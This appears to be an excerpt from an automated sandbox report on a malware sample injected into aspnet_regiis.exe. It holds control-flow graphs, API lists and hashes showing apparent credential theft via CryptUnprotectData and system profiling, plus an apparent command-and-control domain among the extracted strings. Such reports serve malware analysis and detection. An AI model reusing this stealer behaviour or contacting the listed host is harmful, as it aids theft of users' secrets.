                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                    • String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
                                                                                    • API String ID: 2573436264-4038474941
                                                                                    • Opcode ID: 1f34ff72e00063f77036d798f25a843def0576bdf1e67799a6d33057389dd70e
                                                                                    • Instruction ID: 1b7e8765cf6946256e37e315025873e22184af81f41904914125e94c30f275ff
                                                                                    • Opcode Fuzzy Hash: 1f34ff72e00063f77036d798f25a843def0576bdf1e67799a6d33057389dd70e
                                                                                    • Instruction Fuzzy Hash: 2122DE766083419BD310DF28C885B6BBBE6FBC5314F188A2DE595DB3A0DB75D805CB82

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 83 8b9362-8b9374 84 8b9380-8b93bb 83->84 84->84 85 8b93bd-8b93c5 84->85 86 8b940a-8b9465 call 8a1a50 85->86 87 8b93c7-8b93d6 85->87 95 8b9470-8b94d2 86->95 88 8b93e0-8b93e7 87->88 90 8b93e9-8b93ec 88->90 91 8b93f0-8b93f6 88->91 90->88 93 8b93ee 90->93 91->86 94 8b93f8-8b9407 call 8dd910 91->94 93->86 94->86 95->95 96 8b94d4-8b94fb call 8a1d90 95->96 101 8b933a 96->101 102 8b9502-8b956f 96->102 103 8b95f2-8b95f4 96->103 108 8b9340-8b9349 call 8a7ee0 101->108 104 8b9570-8b95c7 102->104 105 8b9600-8b9606 103->105 104->104 106 8b95c9-8b95eb call 8a1d90 104->106 105->105 107 8b9608-8b963e 105->107 106->102 106->103 106->108 117 8b934c-8b9351 106->117 118 8b9360 106->118 111 8b9640-8b9643 107->111 112 8b9645-8b9648 107->112 108->117 111->112 115 8b964a 111->115 116 8b964c-8b9658 112->116 115->116 120 8b965a-8b965d 116->120 121 8b965f 116->121 117->118 118->118 120->121 122 8b9660-8b967e call 8a7ed0 120->122 121->122 125 8b9795-8b97f4 call 8df450 CryptUnprotectData 122->125 126 8b9684-8b968b 122->126 125->102 125->103 127 8b96b2-8b96fc call 8bd140 * 2 126->127 134 8b96fe-8b9719 call 8bd140 127->134 135 8b96a0-8b96ac 127->135 134->135 138 8b971b-8b9743 134->138 135->125 135->127 139 8b9749-8b975f call 8bd140 138->139 140 8b9691-8b9695 138->140 143 8b968d 139->143 144 8b9765-8b9790 139->144 140->135 143->140 144->135
                                                                                    APIs
                                                                                      • Part of subcall function 008DD910: LdrInitializeThunk.NTDLL(008E09B8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 008DD93E
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008B97EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataInitializeThunkUnprotect
                                                                                    • String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
                                                                                    • API String ID: 279577407-4262920783
                                                                                    • Opcode ID: ab58391b0fb36f82ea0310de028db119c5848fea4981bf3d3eab1a7a05da5d3c
                                                                                    • Instruction ID: d0b3fce763171793a2e8215f1c9b7ef439670c40352e53d33e449eb93faa8a60
                                                                                    • Opcode Fuzzy Hash: ab58391b0fb36f82ea0310de028db119c5848fea4981bf3d3eab1a7a05da5d3c
                                                                                    • Instruction Fuzzy Hash: A0C1D772A083828BD728DF28C8916AFB7E2FBD5314F19892CD5D9C7352DB349805CB42

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 271 8ade48-8ade78 call 8a95a0 CoUninitialize 274 8ade80-8aded4 271->274 274->274 275 8aded6-8adeef 274->275 276 8adef0-8adf25 275->276 276->276 277 8adf27-8adf87 276->277 278 8adf90-8adfe9 277->278 278->278 279 8adfeb-8adffc 278->279 280 8ae01b-8ae027 279->280 281 8adffe-8ae00f 279->281 283 8ae03b-8ae045 280->283 284 8ae029-8ae02a 280->284 282 8ae010-8ae019 281->282 282->280 282->282 286 8ae05b-8ae067 283->286 287 8ae047-8ae04b 283->287 285 8ae030-8ae039 284->285 285->283 285->285 288 8ae07b-8ae085 286->288 289 8ae069-8ae06a 286->289 290 8ae050-8ae059 287->290 292 8ae09b-8ae0a7 288->292 293 8ae087-8ae08b 288->293 291 8ae070-8ae079 289->291 290->286 290->290 291->288 291->291 295 8ae0a9-8ae0ab 292->295 296 8ae0c1-8ae1df 292->296 294 8ae090-8ae099 293->294 294->292 294->294 297 8ae0b0-8ae0bd 295->297 298 8ae1e0-8ae22a 296->298 297->297 299 8ae0bf 297->299 298->298 300 8ae22c-8ae248 298->300 299->296 301 8ae250-8ae27c 300->301 301->301 302 8ae27e-8ae2a5 call 8ab4f0 301->302 304 8ae2aa-8ae2c4 302->304
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: Uninitialize
                                                                                    • String ID: .a]b$GK8m$LM$T_RE$abruptyopsn.shop$iped$wtf|
                                                                                    • API String ID: 3861434553-1671141637
                                                                                    • Opcode ID: 4281bb545b030d549c012c722cdf03f7c9ca683ef7ef14fb22ea460f829c1c42
                                                                                    • Instruction ID: 7184fd3bb869c5c93402a01642e8e4dc01127b7f513b3a5839cc69a87f72eb50
                                                                                    • Opcode Fuzzy Hash: 4281bb545b030d549c012c722cdf03f7c9ca683ef7ef14fb22ea460f829c1c42
                                                                                    • Instruction Fuzzy Hash: 84B101756493C18BD3358F29C8903EFBBE1EBD7310F188D6DD4D98B242C67985068B92

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 349 8c29cd-8c29d9 350 8c2a6f-8c2a7f 349->350 351 8c2ad6-8c2ae6 349->351 352 8c2a26-8c2a39 349->352 353 8c29e0-8c29fd 349->353 354 8c2a10-8c2a1f 349->354 355 8c2ad0 349->355 356 8c2a40-8c2a4e 349->356 350->351 350->355 357 8c2a60-8c2a68 350->357 358 8c2aed-8c2b2c call 8df450 * 2 350->358 359 8c2aae-8c2ab4 350->359 360 8c2b58-8c2b74 350->360 361 8c2a86-8c2a99 350->361 362 8c2aa0-8c2aab 350->362 363 8c2ac0 350->363 364 8c2b40 350->364 365 8c2e31-8c2e63 call 8aa600 350->365 351->358 351->360 351->364 351->365 366 8c2e6a-8c2e7d 351->366 352->350 352->354 352->355 352->356 353->350 353->351 353->352 353->354 353->355 353->356 354->350 354->352 354->354 354->355 354->356 356->350 356->354 356->357 357->350 357->354 358->364 358->365 358->366 383 8c2ebe-8c2ede 358->383 384 8c2ee5-8c2ef7 358->384 385 8c2e90-8c2eab 358->385 386 8c2eb2-8c2eb7 358->386 397 8c2f00-8c2f12 358->397 359->363 367 8c2d89-8c2d95 360->367 368 8c2c24-8c2c57 360->368 369 8c2bc0 360->369 370 8c2b80-8c2b8a 360->370 371 8c2c60-8c2c68 360->371 372 8c2dc0-8c2dd2 360->372 373 8c2be2-8c2bea 360->373 374 8c2d9c-8c2db0 360->374 375 8c2dd9-8c2de8 360->375 376 8c2bf7-8c2c07 360->376 377 8c2bd0-8c2bd8 360->377 378 8c2c10-8c2c1d 360->378 379 8c2c70-8c2c79 360->379 380 8c2b91-8c2bb9 360->380 361->351 361->355 361->357 361->358 361->359 361->360 361->362 361->363 361->364 361->365 361->366 362->359 363->355 387 8c2b48-8c2b51 364->387 365->366 365->383 365->384 365->385 365->386 365->397 366->383 366->384 366->385 366->386 367->368 367->369 367->370 367->371 367->372 367->373 367->374 367->375 367->376 367->377 367->378 367->379 388 8c2def-8c2df6 367->388 389 8c2dff-8c2e09 367->389 390 8c3016-8c301f 367->390 391 8c3020 367->391 392 8c3120-8c3187 367->392 393 8c3001-8c3013 367->393 394 8c3022-8c302c 367->394 368->371 369->377 370->367 370->368 370->369 370->370 370->371 370->372 370->373 370->374 370->375 370->376 370->377 370->378 370->379 370->380 396 8c2c7d-8c2c8a 371->396 372->375 372->388 372->389 372->390 372->391 372->392 372->393 372->394 373->376 374->372 374->375 374->388 374->389 374->390 374->391 374->392 374->393 374->394 375->388 375->389 375->390 375->391 375->392 375->393 375->394 376->368 376->370 376->371 376->372 376->375 376->378 376->379 377->373 378->368 378->370 378->371 378->372 378->375 378->379 379->396 380->368 380->369 380->370 380->371 380->372 380->373 380->375 380->376 380->377 380->378 380->379 383->384 383->385 383->386 384->364 384->387 384->397 398 8c2e22-8c2e2a 384->398 385->383 385->384 385->386 386->383 386->385 387->360 387->364 387->384 387->387 387->398 388->389 389->390 390->391 401 8c3190-8c31be 392->401 393->390 403 8c2c90-8c2cfe 396->403 405 8c2f20-8c2f8a 397->405 398->364 398->365 398->366 398->383 398->384 398->385 398->386 398->397 401->401 409 8c31c0-8c3208 RtlExpandEnvironmentStrings 401->409 403->403 411 8c2d00-8c2d10 403->411 405->405 412 8c2f8c-8c2f97 405->412 414 8c3210-8c325f 409->414 411->370 415 8c2d16-8c2d25 411->415 416 8c2f9d-8c2fa9 412->416 417 8c2e10-8c2e1b 412->417 414->414 418 8c3261-8c326e 414->418 419 8c2d30-8c2d37 415->419 420 8c2fb0-8c2fb7 416->420 417->364 417->387 417->398 421 8c32dc-8c332b call 8a7ed0 418->421 422 8c32bc-8c32c2 call 8a7ee0 418->422 423 8c342f-8c3441 418->423 424 8c3448-8c34f4 call 8a7ed0 418->424 425 8c32b4 418->425 426 8c3275-8c32ad call 8a7ed0 RtlExpandEnvironmentStrings 418->426 427 8c32c5-8c32ca 418->427 428 8c35c6 418->428 429 8c35b6-8c35be 418->429 430 8c35e1-8c366e 418->430 431 8c32d2-8c32db 418->431 432 8c2d39-8c2d3c 419->432 433 8c2d43-8c2d49 419->433 434 8c2fb9-8c2fbc 420->434 435 8c2fc3-8c2fc9 420->435 475 8c3330-8c33ad 421->475 422->427 423->422 423->424 423->427 423->428 423->429 423->430 423->431 437 8c35cc-8c35d2 call 8a7ee0 423->437 438 8c36a4-8c36bb 423->438 439 8c37ba-8c37c2 call 8a7ee0 423->439 440 8c35db 423->440 441 8c37b4 423->441 442 8c32d0 423->442 477 8c3500-8c3536 424->477 425->422 426->421 426->422 426->423 426->424 426->425 426->427 426->428 426->429 426->430 427->442 429->428 436 8c3670-8c3684 430->436 432->419 446 8c2d3e 432->446 433->370 447 8c2d4f-8c2d82 call 8dd910 433->447 434->420 449 8c2fbe 434->449 435->417 450 8c2fcf-8c2ff6 call 8dd910 435->450 436->436 452 8c3686-8c3694 call 8c1060 436->452 437->440 453 8c36c0-8c36fc 438->453 446->370 447->367 447->368 447->369 447->370 447->371 447->372 447->373 447->374 447->375 447->376 447->377 447->378 447->379 447->380 447->388 447->389 447->390 447->391 447->392 447->393 447->394 449->417 450->393 470 8c3699-8c369c 452->470 453->453 463 8c36fe-8c3771 453->463 471 8c3780-8c3790 463->471 470->438 471->471 476 8c3792-8c37ab call 8c0c30 471->476 475->475 478 8c33af-8c33bd 475->478 476->441 477->477 480 8c3538-8c3543 477->480 481 8c33bf-8c33c4 478->481 482 8c33e1-8c33f0 478->482 484 8c3545-8c354f 480->484 485 8c3561-8c356f 480->485 486 8c33d0-8c33df 481->486 487 8c3411-8c341b call 8e0ba0 482->487 488 8c33f2-8c33f5 482->488 489 8c3550-8c355f 484->489 490 8c3591-8c35af GetLogicalDrives call 8e0ba0 485->490 491 8c3571-8c3574 485->491 486->482 486->486 496 8c3420-8c3428 487->496 492 8c3400-8c340f 488->492 489->485 489->489 490->422 490->427 490->428 490->429 490->431 490->437 490->438 490->439 490->440 490->441 490->442 494 8c3580-8c358f 491->494 492->487 492->492 494->490 494->494 496->422 496->423 496->424 496->427 496->428 496->429 496->430 496->431 496->437 496->438 496->439 496->440 496->441 496->442
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 7x~
                                                                                    • API String ID: 0-3352779061
                                                                                    • Opcode ID: 5363a8648350c30094f0c3fb1f48273ca1055e794095f9fcacd23892ee81a581
                                                                                    • Instruction ID: e112df3b5acceaebd1a637a1fcc9d99b5efb8451f8f75f200ea6ceb29a658688
                                                                                    • Opcode Fuzzy Hash: 5363a8648350c30094f0c3fb1f48273ca1055e794095f9fcacd23892ee81a581
                                                                                    • Instruction Fuzzy Hash: FE723372A18245CFD718CF68EC81BAAB7B2FF85310F09856CE945AB395E734D901CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 498 8a8640-8a8651 call 8dd0a0 501 8a88e6-8a88e8 ExitProcess 498->501 502 8a8657-8a865e call 8d54a0 498->502 505 8a88e1 call 8dd860 502->505 506 8a8664-8a868a GetCurrentProcessId GetCurrentThreadId 502->506 505->501 508 8a868c-8a868e 506->508 509 8a8690-8a876a SHGetSpecialFolderPathW 506->509 508->509 510 8a8770-8a878c 509->510 510->510 511 8a878e-8a87bf call 8dbc90 510->511 514 8a87c0-8a87dc 511->514 515 8a87de-8a87f4 514->515 516 8a87f6-8a880b GetForegroundWindow 514->516 515->514 517 8a88ab-8a88c3 call 8a99e0 516->517 518 8a8811-8a8832 516->518 523 8a88cf-8a88d6 517->523 524 8a88c5 call 8ac660 517->524 519 8a8838-8a88a9 518->519 520 8a8834-8a8836 518->520 519->517 520->519 523->505 525 8a88d8-8a88de call 8a7ee0 523->525 528 8a88ca call 8ab4c0 524->528 525->505 528->523
                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 008A8664
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 008A866E
                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 008A874C
                                                                                    • GetForegroundWindow.USER32 ref: 008A8803
                                                                                    • ExitProcess.KERNEL32 ref: 008A88E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4063528623-0
                                                                                    • Opcode ID: ea38a4e2b1e9e2f7d9344ab689f9d3c2ea29e901e0b49b318155174372e022e3
                                                                                    • Instruction ID: 268f7485bf79e453347bdb3550feb238ac266d367e8aaa6e3212ff8f99b446f6
                                                                                    • Opcode Fuzzy Hash: ea38a4e2b1e9e2f7d9344ab689f9d3c2ea29e901e0b49b318155174372e022e3
                                                                                    • Instruction Fuzzy Hash: C3612B77B443084BE718AEACCC86356B7D2EB85710F1E813DA594DB392ED78DC009796

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 579 8cbe8a-8cbea6 580 8cbeb0-8cbf05 579->580 580->580 581 8cbf07-8cbf0e 580->581 582 8cc284 581->582 583 8cbf14-8cbf1b 581->583 584 8cc287-8cc2a5 582->584 585 8cbf20-8cbf29 583->585 588 8cc2b0-8cc2dd 584->588 585->585 586 8cbf2b 585->586 586->584 588->588 589 8cc2df-8cc2e6 588->589 590 8cc2e8-8cc2ef 589->590 591 8cc2fb-8cc307 589->591 592 8cc2f0-8cc2f9 590->592 593 8cc309-8cc30b 591->593 594 8cc321-8cc348 call 8df450 591->594 592->591 592->592 595 8cc310-8cc31d 593->595 598 8cc34d-8cc38f GetPhysicallyInstalledSystemMemory 594->598 595->595 597 8cc31f 595->597 597->594 599 8cc390-8cc3e9 598->599 599->599 600 8cc3eb-8cc429 call 8bdc90 599->600 603 8cc430-8cc471 600->603 603->603 604 8cc473-8cc47a 603->604 605 8cc47c-8cc483 604->605 606 8cc49d 604->606 607 8cc490-8cc499 605->607 608 8cc4a0-8cc4aa 606->608 607->607 609 8cc49b 607->609 610 8cc4ac-8cc4af 608->610 611 8cc4bd 608->611 609->608 612 8cc4b0-8cc4b9 610->612 613 8cc4bf-8cc4ce 611->613 612->612 614 8cc4bb 612->614 615 8cc4eb-8cc53a 613->615 616 8cc4d0-8cc4d7 613->616 614->613 618 8cc540-8cc55e 615->618 617 8cc4e0-8cc4e9 616->617 617->615 617->617 618->618 619 8cc560-8cc567 618->619 620 8cc569-8cc56f 619->620 621 8cc57b-8cc588 619->621 622 8cc570-8cc579 620->622 623 8cc58a-8cc591 621->623 624 8cc5ab-8cc661 621->624 622->621 622->622 625 8cc5a0-8cc5a9 623->625 626 8cc662 624->626 625->624 625->625 626->626
                                                                                    APIs
                                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 008CC358
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                    • String ID: BVAI
                                                                                    • API String ID: 3960555810-2651495128
                                                                                    • Opcode ID: dd19d0c541a30aa451e1a00a120193a31ffcd019f4f9e1d798e6036739af090a
                                                                                    • Instruction ID: 5cb2d7ed32c1d7abae0459e0b968d55ece11fceeb37efb45074277ce707ca1bf
                                                                                    • Opcode Fuzzy Hash: dd19d0c541a30aa451e1a00a120193a31ffcd019f4f9e1d798e6036739af090a
                                                                                    • Instruction Fuzzy Hash: 45C1E27160C3908BC7298F2984507ABBFE1FF9A308F1849ADD4C9D7392D67989068B56

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 631 8cc26c-8cc2a5 call 8d27d0 call 8a7ee0 637 8cc2b0-8cc2dd 631->637 637->637 638 8cc2df-8cc2e6 637->638 639 8cc2e8-8cc2ef 638->639 640 8cc2fb-8cc307 638->640 641 8cc2f0-8cc2f9 639->641 642 8cc309-8cc30b 640->642 643 8cc321-8cc348 call 8df450 640->643 641->640 641->641 644 8cc310-8cc31d 642->644 647 8cc34d-8cc38f GetPhysicallyInstalledSystemMemory 643->647 644->644 646 8cc31f 644->646 646->643 648 8cc390-8cc3e9 647->648 648->648 649 8cc3eb-8cc429 call 8bdc90 648->649 652 8cc430-8cc471 649->652 652->652 653 8cc473-8cc47a 652->653 654 8cc47c-8cc483 653->654 655 8cc49d 653->655 656 8cc490-8cc499 654->656 657 8cc4a0-8cc4aa 655->657 656->656 658 8cc49b 656->658 659 8cc4ac-8cc4af 657->659 660 8cc4bd 657->660 658->657 661 8cc4b0-8cc4b9 659->661 662 8cc4bf-8cc4ce 660->662 661->661 663 8cc4bb 661->663 664 8cc4eb-8cc53a 662->664 665 8cc4d0-8cc4d7 662->665 663->662 667 8cc540-8cc55e 664->667 666 8cc4e0-8cc4e9 665->666 666->664 666->666 667->667 668 8cc560-8cc567 667->668 669 8cc569-8cc56f 668->669 670 8cc57b-8cc588 668->670 671 8cc570-8cc579 669->671 672 8cc58a-8cc591 670->672 673 8cc5ab-8cc661 670->673 671->670 671->671 674 8cc5a0-8cc5a9 672->674 675 8cc662 673->675 674->673 674->674 675->675
                                                                                    APIs
                                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 008CC358
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                    • String ID: BVAI
                                                                                    • API String ID: 3960555810-2651495128
                                                                                    • Opcode ID: fbd5f6c424431466d963eb09140067c410e2828b141c7f3a5718f9cff34d5087
                                                                                    • Instruction ID: 1972c5719cf7a29c0bb3143e5989ac0d68ccf7966471e7296fbb82aa9eaf715e
                                                                                    • Opcode Fuzzy Hash: fbd5f6c424431466d963eb09140067c410e2828b141c7f3a5718f9cff34d5087
                                                                                    • Instruction Fuzzy Hash: 72A1D27160C3908BC7298F2984507ABBFE1FF9A308F18496DD4CDD7392D77989068B5A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 676 8cc282-8cc2a5 678 8cc2b0-8cc2dd 676->678 678->678 679 8cc2df-8cc2e6 678->679 680 8cc2e8-8cc2ef 679->680 681 8cc2fb-8cc307 679->681 682 8cc2f0-8cc2f9 680->682 683 8cc309-8cc30b 681->683 684 8cc321-8cc38f call 8df450 GetPhysicallyInstalledSystemMemory 681->684 682->681 682->682 685 8cc310-8cc31d 683->685 689 8cc390-8cc3e9 684->689 685->685 687 8cc31f 685->687 687->684 689->689 690 8cc3eb-8cc429 call 8bdc90 689->690 693 8cc430-8cc471 690->693 693->693 694 8cc473-8cc47a 693->694 695 8cc47c-8cc483 694->695 696 8cc49d 694->696 697 8cc490-8cc499 695->697 698 8cc4a0-8cc4aa 696->698 697->697 699 8cc49b 697->699 700 8cc4ac-8cc4af 698->700 701 8cc4bd 698->701 699->698 702 8cc4b0-8cc4b9 700->702 703 8cc4bf-8cc4ce 701->703 702->702 704 8cc4bb 702->704 705 8cc4eb-8cc53a 703->705 706 8cc4d0-8cc4d7 703->706 704->703 708 8cc540-8cc55e 705->708 707 8cc4e0-8cc4e9 706->707 707->705 707->707 708->708 709 8cc560-8cc567 708->709 710 8cc569-8cc56f 709->710 711 8cc57b-8cc588 709->711 712 8cc570-8cc579 710->712 713 8cc58a-8cc591 711->713 714 8cc5ab-8cc661 711->714 712->711 712->712 715 8cc5a0-8cc5a9 713->715 716 8cc662 714->716 715->714 715->715 716->716
                                                                                    APIs
                                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 008CC358
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                    • String ID: BVAI
                                                                                    • API String ID: 3960555810-2651495128
                                                                                    • Opcode ID: 43833d708a3ceb759400b2f49fbe8fa2e94a7f3cf5f4523cdc239a0c839a3d23
                                                                                    • Instruction ID: 58d75d6f75d11b955dacf4f71d951ad2195ffeba70188114a36e045cd97bc5e5
                                                                                    • Opcode Fuzzy Hash: 43833d708a3ceb759400b2f49fbe8fa2e94a7f3cf5f4523cdc239a0c839a3d23
                                                                                    • Instruction Fuzzy Hash: 0CA1C17160C3908BC7298F2984507ABBFE1BF9A308F18496DD4CDD7392D77989068B5A
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(008E09B8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 008DD93E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 554 8cb842-8cb84c 555 8cb84e-8cb855 554->555 556 8cb86b-8cb8b6 FreeLibrary call 8df450 554->556 557 8cb860-8cb869 555->557 562 8cb8c0-8cb8e5 556->562 557->556 557->557 562->562 563 8cb8e7-8cb8f1 562->563 564 8cb90b-8cb942 GetComputerNameExA 563->564 565 8cb8f3-8cb8fa 563->565 567 8cb946 564->567 566 8cb900-8cb909 565->566 566->564 566->566 567->567
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?), ref: 008CB875
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 008CB924
